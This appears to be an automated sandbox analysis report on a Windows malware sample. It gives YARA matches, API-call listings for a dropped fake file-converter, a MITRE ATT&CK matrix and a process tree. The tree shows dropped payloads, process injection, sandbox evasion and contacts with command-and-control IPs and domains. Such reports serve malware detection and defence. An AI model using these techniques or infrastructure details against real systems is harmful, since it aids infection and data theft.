                    Source: Yara match File source: Process Memory Space: ntfs2fat32converter102.exe PID: 8920, type: MEMORYSTR
                    Source: Yara match File source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 9056, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_609660FA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60963143
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,5_2_6096923E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,5_2_6096A38C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6096748C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_609254B1
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6094B407
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6090F435 sqlite3_bind_parameter_index,5_2_6090F435
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,5_2_609255D4
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_609255FF sqlite3_bind_text,5_2_609255FF
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,5_2_6094B54C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60925686
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,5_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,5_2_609256E5
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6092562A sqlite3_bind_blob,5_2_6092562A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,5_2_60925655
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6094C64A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_609687A7
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,5_2_6092570B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F772
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_60925778
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6090577D sqlite3_bind_parameter_name,5_2_6090577D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B764
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6090576B sqlite3_bind_parameter_count,5_2_6090576B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6094A894
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F883
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,5_2_6096281E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,5_2_6096583A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6094A92B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6090EAE5 sqlite3_transfer_bindings,5_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,5_2_6095FB98
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe; Code function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2
                    MITRE ATT&CK matrix, listed per tactic column (a number before a technique is the count displayed beside it in the original matrix):

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                    Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                    Execution: 131 Windows Management Instrumentation; 3 Native API; 1 Shared Modules; 2 Command and Scripting Interpreter; 2 Service Execution; 1 PowerShell; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                    Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 5 Windows Service; 1 Bootkit; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 5 Windows Service; 512 Process Injection; Startup Items; Scheduled Task/Job; At; Cron
                    Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 32 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 1 Valid Accounts; 341 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 512 Process Injection; 1 Bootkit
                    Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                    Discovery: 2 System Time Discovery; 1 Account Discovery; 12 File and Directory Discovery; 67 System Information Discovery; 571 Security Software Discovery; 1 Process Discovery; 341 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery; 1 System Network Configuration Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                    Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                    Command and Control: 14 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 4 Non-Application Layer Protocol; 135 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1665555; Sample: nK8noQeiXl.exe; Startdate: 15/04/2025; Architecture: WINDOWS; Score: 100

                    Behavior graph as a process tree (node numbers are the graph's own node IDs; "counts shown" are the numbers the graph prints next to a process):

                    [2] Start
                      DNS/IP: quag.cn; yahoo.com; 4 other IPs or domains
                      Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures
                      Started: [14] nK8noQeiXl.exe; [18] regsvr32.exe

                    [14] nK8noQeiXl.exe (counts shown: 1)
                      Dropped: C:\Users\user\AppData\...\svchost015.exe, PE32
                      Signatures: Detected unpacking (creates a PE file in dynamic memory); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                      Started: [20] svchost015.exe

                    [18] regsvr32.exe

                    [20] svchost015.exe (counts shown: 25)
                      DNS/IP: 185.156.73.98, 49692, 49695, 49696 RELDAS-NETRU Russian Federation
                      Dropped: C:\Users\user\AppData\...\DrjfIAN86u.exe, PE32; C:\Users\user\AppData\...\vn6ZAuKJ8m7U3.exe, PE32; C:\Users\user\AppData\...\Qv4wdsLMG.exe, PE32; 3 other malicious files
                      Started: [24] DrjfIAN86u.exe; [27] Qv4wdsLMG.exe; [30] vn6ZAuKJ8m7U3.exe

                    [24] DrjfIAN86u.exe (counts shown: 2)
                      Dropped: C:\Users\user\AppData\...\DrjfIAN86u.tmp, PE32
                      Started: [33] DrjfIAN86u.tmp

                    [27] Qv4wdsLMG.exe (counts shown: 2)
                      Dropped: C:\Users\user\AppData\Local\...\Qv4wdsLMG.tmp, PE32
                      Signatures: Multi AV Scanner detection for dropped file
                      Started: [36] Qv4wdsLMG.tmp

                    [30] vn6ZAuKJ8m7U3.exe
                      DNS/IP: proenhann.digital 104.21.40.117 CLOUDFLARENETUS United States; h1.passionwhenever.shop 104.21.53.21 CLOUDFLARENETUS United States
                      Dropped: C:\Users\...\5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe, HTML
                      Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Creates HTML files with .exe extension (expired dropper behavior); 3 other signatures

                    [33] DrjfIAN86u.tmp (counts shown: 18 20)
                      Dropped: C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32; 22 other malicious files
                      Started: [38] ntfs2fat32converter102.exe

                    [36] Qv4wdsLMG.tmp (counts shown: 3 5)
                      Dropped: C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
                      Started: [42] Qv4wdsLMG.exe

                    [38] ntfs2fat32converter102.exe (counts shown: 1 19)
                      DNS/IP: 185.39.17.76 RU-TAGNET-ASRU Russian Federation; 62.210.201.223 OnlineSASFR France
                      Dropped: C:\ProgramData\...\sqlite3.dll, PE32; C:\ProgramData\...86TFS2FAT32Converter.exe, PE32

                    [42] Qv4wdsLMG.exe (counts shown: 2)
                      Dropped: C:\Users\user\AppData\Local\...\Qv4wdsLMG.tmp, PE32
                      Started: [44] Qv4wdsLMG.tmp

                    [44] Qv4wdsLMG.tmp (counts shown: 19 7)
                      Dropped: C:\Users\user\AppData\...\user32_8.drv (copy), PE32; C:\Users\user\AppData\Roaming\is-4R09J.tmp, PE32; C:\Users\user\AppData\...\unins000.exe (copy), PE32; 3 other malicious files
                      Started: [47] regsvr32.exe

                    [47] regsvr32.exe
                      DNS/IP: quag.cn 194.87.98.18 MTW-ASRU Russian Federation; mta5.am0.yahoodns.net 67.195.204.77 YAHOO-3US United States; microsoft-com.mail.protection.outlook.com 52.101.41.22 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                      Signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Started: [51] powershell.exe; [54] powershell.exe; [56] powershell.exe

                    [51] powershell.exe
                      Signatures: Loading BitLocker PowerShell Module
                      Started: [58] conhost.exe

                    [54] powershell.exe
                      Started: [60] conhost.exe

                    [56] powershell.exe
                      Started: [62] conhost.exe
